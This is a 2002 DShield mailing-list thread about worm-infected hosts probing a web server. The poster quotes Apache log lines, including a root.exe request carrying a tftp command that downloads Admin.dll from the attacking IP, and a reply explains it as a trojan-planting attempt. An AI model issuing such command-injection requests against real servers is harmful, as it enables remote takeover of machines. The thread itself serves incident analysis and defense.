[Dshield] Something different in Apache logs

Clint Byrum cbyrum at erp.com
Fri Mar 1 08:45:15 GMT 2002


On Thu, 2002-02-28 at 19:03, Erick Brockway wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
> 
>     Normally a compromised machine scanning my webserver begins with;
> =20=20
> 4.41.250.31 - - [27/Feb/2002:15:24:05 -0800] "GET
> /scripts/root.exe?/c+dir HTTP/1.0" 200 2701
> 4.41.250.31 - - [27/Feb/2002:15:24:41 -0800] "GET
> /MSADC/root.exe?/c+dir HTTP/1.0" 404 292
> etc.

Well.. these are infected.. and sort of compromised.. but they're still
automated.

>     NOW I'm seeing two new lines inserted;
> 4.41.250.31 - - [27/Feb/2002:15:24:39 -0800] "GET
> /scripts/root.exe?/c+tftp%20-i%204.41.250.31%20GET%20Admin.dll%20Admin
> .dll HTTP/1.0" 200 2701
> 4.41.250.31 - - [27/Feb/2002:15:24:40 -0800] "GET /scripts/Admin.dll
> HTTP/1.0" 404 295

This looks like an attempt to put a trojan on your system and then run
it. Bad stuff indeed. If you had cleaned out Nimda, but left behind the
trojaned root.exe, well... Nimda would have reinfected you, but also
this little devil would work and they'd have remote control of your
machine.

>     Notice the first seems to point to a specific IP [204.41.250.31].
> Anybody seen this? There have been others I noticed pointing to one
> other IP in Spain. This the originator of the specific scan?
> 
> -----BEGIN PGP SIGNATURE-----
> Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com>
> 
> iQA/AwUBPH7va5kmeTuuwg2cEQJaiwCeK7CMuo7jsBBChy2BUpYcluOnWLcAn2cQ
> Kh7GFEoaAb9hlYnVa/7+RUBc
> =3DZmTa
> -----END PGP SIGNATURE-----
> 
> 
> 
> [[ Attachement of type text/html deleted]]
> 
> _______________________________________________
> Dshield mailing list
> Dshield at dshield.org
> To change your subscription options (or unsubscribe), see: http://www1.dshield.org/mailman/listinfo/list
-- 

------------------------------
Clint Byrum
ERP.COM 
(858) 707-7525




More information about the list mailing list